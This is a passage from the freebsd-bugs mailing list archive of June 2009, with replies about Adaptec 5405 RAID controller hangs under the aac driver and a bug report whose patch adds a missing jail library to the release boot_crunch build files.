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 G+NX/I+/9ukf82rz0MR3I59a9c+KXhTWdd8ZvdadZieFIEjLeci4YZOMMwPQivMNY0XUNCu0tdRt /ImeMSBd6tlSSM5UkdQaU/iYR2RRZieM0gJ7GkoqShcn1P50ZNJRQAu4jPJzSliepNNooAXJ9TSH miigBQSOhpQxByDzim0UAKevWkzRRQAuT60ZIHWkooAXPvQST1pKKAHKccZ60bj6n1ptFACmk6UU UALkjjNGT6/jSUUAODH1/CgMeOTx056U2igB24gYz+FLuJJO7OeuaZRQAHmlBx3pKKAF3H1NITmi igApQxHekooAUk9M5pKKKAFBpQxHem0UALn3NLuODz14ptFADixJJz1OaTJx1pKKAF/GlBOOtNoo AUn3zTldlYMrEMOQfSmUUAKTk0qsVBwTz15ptFADizZzuP50Fie5P402igBwY+uKNx9fem0UAKSa M8daSigB284xk0hOetJRQAoOO9GT60lFAC5PrSZoooAXJ9aPxpKKAClBI74pKKAHBj2PIpCT0zSU UALmjJx1pKKAFJPrRnjrSUUALnvml3H1/Cm0UABOaKKKACiiigAooooAKKKKACiiigAooooAKKKK ACiiigAr174Df8hPWf8ArjF/Nq8hr174DcalrX/XGL+bVcPiJn8LMb41H/ivf+3WP+bV56ORzRRS n8TCOyDAo2iiipKDaPSjaPSiigA2j0o2j0oooANo9KNo9KKKADaPSjaPSiigA2j0o2j0oooANo9K No9KKKADaPSjaPSiigA2j0o2j0oooAawweKSiigAooooAKKKKYBRRRSAcnLKPU4NIeD+FFFACUUU UAFFFFMAooooAKKKKQBTh0/OiigBDSUUUAFFFFABRRRQAUo+6T3oooAUAEUu0elFFABtHpSHg4FF FACUlFFMBaSiigApV5zn0NFFAA3DGkoopAFFFFABTk5ZR6nBoooAQ8H8KSiigAooooAKO1FFADlA Ipdo9KKKADaPSjaPSiigA2j0o2j0oooANo9KNo9KKKADaPSjaPSiigA2j0o2j0oooANo9KNo9KKK ADaPSjaPSiigA2j0o2j0oooANo9K9d+A6g6pq6nlTAmR/wACooqofETP4T//2Q== --0016e65a0dc421977e046d3da3e1-- From owner-freebsd-bugs@FreeBSD.ORG Fri Jun 26 11:16:44 2009 Return-Path: Delivered-To: freebsd-bugs@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 4F14A106566C for ; Fri, 26 Jun 2009 11:16:44 +0000 (UTC) (envelope-from freebsdusb@bindone.de) Received: from mail.bindone.de (mail.bindone.de [80.190.134.51]) by mx1.freebsd.org (Postfix) with SMTP id AC4F78FC18 for ; Fri, 26 Jun 2009 11:16:43 +0000 (UTC) (envelope-from freebsdusb@bindone.de) Received: (qmail 71077 invoked by uid 89); 26 Jun 2009 11:16:41 -0000 Received: from unknown (HELO ufo.bindone.de) (mg@bindone.de@87.152.189.97) by mail.bindone.de with ESMTPA; 26 Jun 2009 11:16:41 -0000 Message-ID: <4A44ADD1.4000004@bindone.de> Date: Fri, 26 Jun 2009 13:15:29 +0200 From: Michael User-Agent: Thunderbird 2.0.0.17pre (X11/20090202) MIME-Version: 1.0 To: Aleksandr Stankevic References: <200906261050.n5QAo2wc076724@freefall.freebsd.org> In-Reply-To: <200906261050.n5QAo2wc076724@freefall.freebsd.org> Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Cc: freebsd-bugs@FreeBSD.org Subject: Re: kern/135408: [aac] Adaptec 5405 RAID controller hanging under high load +suggested fix X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 26 Jun 2009 11:16:44 -0000 Aleksandr Stankevic wrote: > The following reply was made to PR kern/135408; it has been noted by GNATS. > > From: Aleksandr Stankevic > To: bug-followup@FreeBSD.org, freebsdusb@bindone.de, msmith@freebsd.org, > scottl@freebsd.org > Cc: > Subject: Re: kern/135408: [aac] Adaptec 5405 RAID controller hanging under > high load +suggested fix > Date: Fri, 26 Jun 2009 13:16:44 +0300 > > --0016e65a0dc421977e046d3da3e1 > Content-Type: text/plain; charset=ISO-8859-1 > Content-Transfer-Encoding: 7bit > > Hi there, > > I've been having the same problem with aac on FreeBSD 7.2/amd64. > We bought some Sun Fire X4150 servers which have Adaptec Raid > controller and use aac driver. > > The suggested fix (increasing the timeouts to 45+ seconds) didn't > help. It delayed the crash for a bit, but didn't completely fix it. > > I'm also sending some screenshots of the errors (without debugging, > and with debugging), bootup screenshot and dmesg output of the system. > > If needed, it's possible to grant access to the server via Sun eLOM. > > > -- > Aleksandr Stankevic > Email: alexiukas@gmail.com > ICQ: 214480900 > MSN: alex@braske.net > Y!M: freelancealex@yahoo.com > _______________________________________________ > freebsd-bugs@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-bugs > To unsubscribe, send any mail to "freebsd-bugs-unsubscribe@freebsd.org" I can confirm that the suggested fix was a red herring. We experience the same crashes here, tried tweaking everything, the best we could do was delaying the crash a little bit. This also happens with the aacu drivers provided directly by adaptec (they're incredibly slow, which basically helps delaying the crash by 1-2 hours). I would assume this is some problem with the controller/firmware (the firmware version shipped is newer than the BSD driver version provided by adaptec). Yuri Gorchakov just fowarded me this piece of information - adaptec just released a new firmware for this controller: "Hello Yuri, Hello from Adaptec, This message is in response to the problems that you are experiencing when using the Adaptec 5405 in your FreeBSD system. Adaptec recently posted a firmware upgrade for the Adaptec 5405 and the release notes doe mention a couple of fixes for FreeBSD. You may want to try this to see if this might help to resolve your issues. The most recent firmware download is available at the link below. http://www.adaptec.com/en-US/speed/raid/asr/fw_bios/5405_fw_b17380_exe.htm Adaptec Technical Support" Maybe this helps you (even so the release notes don't look that promising and the number of severe problems fixed makes me wonder if I ever want to use adaptec again :). Michael From owner-freebsd-bugs@FreeBSD.ORG Fri Jun 26 16:00:05 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id D4A611065672 for ; Fri, 26 Jun 2009 16:00:05 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id A95128FC19 for ; Fri, 26 Jun 2009 16:00:05 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5QG052Q016896 for ; Fri, 26 Jun 2009 16:00:05 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5QG05OK016895; Fri, 26 Jun 2009 16:00:05 GMT (envelope-from gnats) Resent-Date: Fri, 26 Jun 2009 16:00:05 GMT Resent-Message-Id: <200906261600.n5QG05OK016895@freefall.freebsd.org> Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer) Resent-To: freebsd-bugs@FreeBSD.org Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, Scot Hetzel Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id B0595106566C for ; Fri, 26 Jun 2009 15:52:48 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (www.freebsd.org [IPv6:2001:4f8:fff6::21]) by mx1.freebsd.org (Postfix) with ESMTP id 6FC598FC23 for ; Fri, 26 Jun 2009 15:52:47 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.14.3/8.14.3) with ESMTP id n5QFql3B083531 for ; Fri, 26 Jun 2009 15:52:47 GMT (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.14.3/8.14.3/Submit) id n5QFqlEh083530; Fri, 26 Jun 2009 15:52:47 GMT (envelope-from nobody) Message-Id: <200906261552.n5QFqlEh083530@www.freebsd.org> Date: Fri, 26 Jun 2009 15:52:47 GMT From: Scot Hetzel To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-3.1 Cc: Subject: bin/136071: 8.0-CURRENT fails to build boot_crunch binaries (make release.4) X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 26 Jun 2009 16:00:06 -0000 >Number: 136071 >Category: bin >Synopsis: 8.0-CURRENT fails to build boot_crunch binaries (make release.4) >Confidential: no >Severity: serious >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Jun 26 16:00:05 UTC 2009 >Closed-Date: >Last-Modified: >Originator: Scot Hetzel >Release: 8.0-CURRENT >Organization: >Environment: FreeBSD hp010.hetzel.org 8.0-CURRENT FreeBSD 8.0-CURRENT #4: Thu Jun 25 23:09:40 CDT 2009 root@hp010.hetzel.org:/usr/obj/usr/src/8x-zfs/sys/DV8135NR amd64 >Description: While performing a 'make release ...', the build failed when generating the boot_crunch binary (release.4) because jail_getid and jail_errmsg were not found in any of the required libraries used to link ifconfig.lo to the boot_crunch binary. The cause of the build failure was due to a missing dependency on the jail library in the /usr/src/release/{arch}/boot_crunch.conf file. >How-To-Repeat: cd /usr/src make buildworld cd /usr/src/release make release CVSROOT=/home/ncvs CHROOTDIR=/path/to/release/dir >Fix: The attached patch adds -ljail to the /usr/src/release/{arch}/boot_crunch.conf files. Patch attached with submission follows: Index: amd64/boot_crunch.conf =================================================================== RCS file: /home/ncvs/src/release/amd64/boot_crunch.conf,v retrieving revision 1.66 diff -u -r1.66 boot_crunch.conf --- amd64/boot_crunch.conf 9 Mar 2009 17:05:31 -0000 1.66 +++ amd64/boot_crunch.conf 26 Jun 2009 15:20:04 -0000 @@ -42,4 +42,4 @@ libs -ll -ledit -lutil -lmd -lcrypt -lftpio -lz -lnetgraph libs -ldialog -lncurses -ldisk -lcam -lsbuf -lufs -ldevinfo -libs -lbsdxml -larchive -lbz2 -lusb +libs -lbsdxml -larchive -lbz2 -lusb -ljail Index: i386/boot_crunch.conf =================================================================== RCS file: /home/ncvs/src/release/i386/boot_crunch.conf,v retrieving revision 1.66 diff -u -r1.66 boot_crunch.conf --- i386/boot_crunch.conf 9 Mar 2009 17:05:31 -0000 1.66 +++ i386/boot_crunch.conf 26 Jun 2009 15:20:22 -0000 @@ -42,4 +42,4 @@ libs -ll -ledit -lutil -lmd -lcrypt -lftpio -lz -lnetgraph libs -ldialog -lncurses -ldisk -lcam -lsbuf -lufs -ldevinfo -libs -lbsdxml -larchive -lbz2 -lusb +libs -lbsdxml -larchive -lbz2 -lusb -ljail Index: ia64/boot_crunch.conf =================================================================== RCS file: /home/ncvs/src/release/ia64/boot_crunch.conf,v retrieving revision 1.17 diff -u -r1.17 boot_crunch.conf --- ia64/boot_crunch.conf 9 Mar 2009 17:05:31 -0000 1.17 +++ ia64/boot_crunch.conf 26 Jun 2009 15:22:01 -0000 @@ -46,4 +46,4 @@ libs -ll -ledit -lutil -lmd -lcrypt -lftpio -lz -lnetgraph libs -ldialog -lncurses -ldisk -lcam -lkiconv -lsbuf -lufs -ldevinfo -libs -lgeom -lbsdxml -larchive -lbz2 -lusb +libs -lgeom -lbsdxml -larchive -lbz2 -lusb -ljail Index: pc98/boot_crunch.conf =================================================================== RCS file: /home/ncvs/src/release/pc98/boot_crunch.conf,v retrieving revision 1.65 diff -u -r1.65 boot_crunch.conf --- pc98/boot_crunch.conf 20 Aug 2008 13:35:39 -0000 1.65 +++ pc98/boot_crunch.conf 26 Jun 2009 15:22:13 -0000 @@ -41,4 +41,4 @@ libs -ll -ledit -lutil -lmd -lcrypt -lftpio -lz -lnetgraph libs -ldialog -lncurses -ldisk -lcam -lsbuf -lufs -lbsdxml -libs -larchive -lbz2 +libs -larchive -lbz2 -ljail Index: powerpc/boot_crunch.conf =================================================================== RCS file: /home/ncvs/src/release/powerpc/boot_crunch.conf,v retrieving revision 1.9 diff -u -r1.9 boot_crunch.conf --- powerpc/boot_crunch.conf 9 Mar 2009 17:05:31 -0000 1.9 +++ powerpc/boot_crunch.conf 26 Jun 2009 15:22:21 -0000 @@ -44,4 +44,4 @@ libs -ll -ledit -lutil -lmd -lcrypt -lftpio -lz -lnetgraph libs -ldialog -lncurses -ldisk -lcam -lkiconv -lsbuf -lufs -libs -lbsdxml -larchive -lbz2 -lusb +libs -lbsdxml -larchive -lbz2 -lusb -ljail Index: sparc64/boot_crunch.conf =================================================================== RCS file: /home/ncvs/src/release/sparc64/boot_crunch.conf,v retrieving revision 1.13 diff -u -r1.13 boot_crunch.conf --- sparc64/boot_crunch.conf 9 Mar 2009 17:05:31 -0000 1.13 +++ sparc64/boot_crunch.conf 26 Jun 2009 15:22:30 -0000 @@ -42,4 +42,4 @@ libs -ll -ledit -lutil -lmd -lcrypt -lftpio -lz -lnetgraph libs -ldialog -lncurses -ldisk -lcam -lsbuf -lufs -lbsdxml -libs -larchive -lbz2 -lusb +libs -larchive -lbz2 -lusb -ljail Index: sun4v/boot_crunch.conf =================================================================== RCS file: /home/ncvs/src/release/sun4v/boot_crunch.conf,v retrieving revision 1.6 diff -u -r1.6 boot_crunch.conf --- sun4v/boot_crunch.conf 9 Mar 2009 17:05:31 -0000 1.6 +++ sun4v/boot_crunch.conf 26 Jun 2009 15:22:38 -0000 @@ -42,4 +42,4 @@ libs -ll -ledit -lutil -lmd -lcrypt -lftpio -lz -lnetgraph libs -ldialog -lncurses -ldisk -lcam -lsbuf -lufs -lbsdxml -libs -larchive -lbz2 -lusb +libs -larchive -lbz2 -lusb -ljail >Release-Note: >Audit-Trail: >Unformatted: From owner-freebsd-bugs@FreeBSD.ORG Fri Jun 26 16:10:03 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 80F88106566C for ; Fri, 26 Jun 2009 16:10:03 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 651BA8FC1D for ; Fri, 26 Jun 2009 16:10:03 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5QGA3iA023900 for ; Fri, 26 Jun 2009 16:10:03 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5QGA3BT023899; Fri, 26 Jun 2009 16:10:03 GMT (envelope-from gnats) Date: Fri, 26 Jun 2009 16:10:03 GMT Message-Id: <200906261610.n5QGA3BT023899@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org From: Michael Cc: Subject: Re: kern/135408: [aac] Adaptec 5405 RAID controller hanging under high load +suggested fix X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: Michael List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 26 Jun 2009 16:10:03 -0000 The following reply was made to PR kern/135408; it has been noted by GNATS. From: Michael To: freebsd-gnats-submit@FreeBSD.org Cc: Subject: Re: kern/135408: [aac] Adaptec 5405 RAID controller hanging under high load +suggested fix Date: Fri, 26 Jun 2009 18:05:03 +0200 Aleksandr Stankevic wrote: > The following reply was made to PR kern/135408; it has been noted by GNATS. > > From: Aleksandr Stankevic > To: bug-followup@FreeBSD.org, freebsdusb@bindone.de, msmith@freebsd.org, > scottl@freebsd.org > Cc: > Subject: Re: kern/135408: [aac] Adaptec 5405 RAID controller hanging under > high load +suggested fix > Date: Fri, 26 Jun 2009 13:16:44 +0300 > > --0016e65a0dc421977e046d3da3e1 > Content-Type: text/plain; charset=ISO-8859-1 > Content-Transfer-Encoding: 7bit > > Hi there, > > I've been having the same problem with aac on FreeBSD 7.2/amd64. > We bought some Sun Fire X4150 servers which have Adaptec Raid > controller and use aac driver. > > The suggested fix (increasing the timeouts to 45+ seconds) didn't > help. It delayed the crash for a bit, but didn't completely fix it. > > I'm also sending some screenshots of the errors (without debugging, > and with debugging), bootup screenshot and dmesg output of the system. > > If needed, it's possible to grant access to the server via Sun eLOM. > > > -- > Aleksandr Stankevic > Email: alexiukas@gmail.com > ICQ: 214480900 > MSN: alex@braske.net > Y!M: freelancealex@yahoo.com > _______________________________________________ > freebsd-bugs@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-bugs > To unsubscribe, send any mail to "freebsd-bugs-unsubscribe@freebsd.org" I can confirm that the suggested fix was a red herring. We experience the same crashes here, tried tweaking everything, the best we could do was delaying the crash a little bit. This also happens with the aacu drivers provided directly by adaptec (they're incredibly slow, which basically helps delaying the crash by 1-2 hours). I would assume this is some problem with the controller/firmware (the firmware version shipped is newer than the BSD driver version provided by adaptec). Yuri Gorchakov just fowarded me this piece of information - adaptec just released a new firmware for this controller: "Hello Yuri, Hello from Adaptec, This message is in response to the problems that you are experiencing when using the Adaptec 5405 in your FreeBSD system. Adaptec recently posted a firmware upgrade for the Adaptec 5405 and the release notes doe mention a couple of fixes for FreeBSD. You may want to try this to see if this might help to resolve your issues. The most recent firmware download is available at the link below. http://www.adaptec.com/en-US/speed/raid/asr/fw_bios/5405_fw_b17380_exe.htm Adaptec Technical Support" Maybe this helps you (even so the release notes don't look that promising and the number of severe problems fixed makes me wonder if I ever want to use adaptec again :). Michael From owner-freebsd-bugs@FreeBSD.ORG Fri Jun 26 17:30:02 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 1FAB11065675 for ; Fri, 26 Jun 2009 17:30:02 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id DD6498FC26 for ; Fri, 26 Jun 2009 17:30:01 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5QHU1Es083879 for ; Fri, 26 Jun 2009 17:30:01 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5QHU1XC083876; Fri, 26 Jun 2009 17:30:01 GMT (envelope-from gnats) Resent-Date: Fri, 26 Jun 2009 17:30:01 GMT Resent-Message-Id: <200906261730.n5QHU1XC083876@freefall.freebsd.org> Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer) Resent-To: freebsd-bugs@FreeBSD.org Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, Andrew Stevenson Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id A03EC106568A; Fri, 26 Jun 2009 17:20:31 +0000 (UTC) (envelope-from andrew@ugh.net.au) Received: from mtagate5.uk.ibm.com (mtagate5.uk.ibm.com [195.212.29.138]) by mx1.freebsd.org (Postfix) with ESMTP id 1A1AF8FC16; Fri, 26 Jun 2009 17:20:30 +0000 (UTC) (envelope-from andrew@ugh.net.au) Received: from d06nrmr1806.portsmouth.uk.ibm.com (d06nrmr1806.portsmouth.uk.ibm.com [9.149.39.193]) by mtagate5.uk.ibm.com (8.14.3/8.13.8) with ESMTP id n5QH2A4i189282; Fri, 26 Jun 2009 17:02:10 GMT Received: from d06av02.portsmouth.uk.ibm.com (d06av02.portsmouth.uk.ibm.com [9.149.37.228]) by d06nrmr1806.portsmouth.uk.ibm.com (8.13.8/8.13.8/NCO v9.2) with ESMTP id n5QH1vtl1495074; Fri, 26 Jun 2009 18:02:10 +0100 Received: from d06av02.portsmouth.uk.ibm.com (loopback [127.0.0.1]) by d06av02.portsmouth.uk.ibm.com (8.12.11.20060308/8.13.3) with ESMTP id n5QH1vt3003864; Fri, 26 Jun 2009 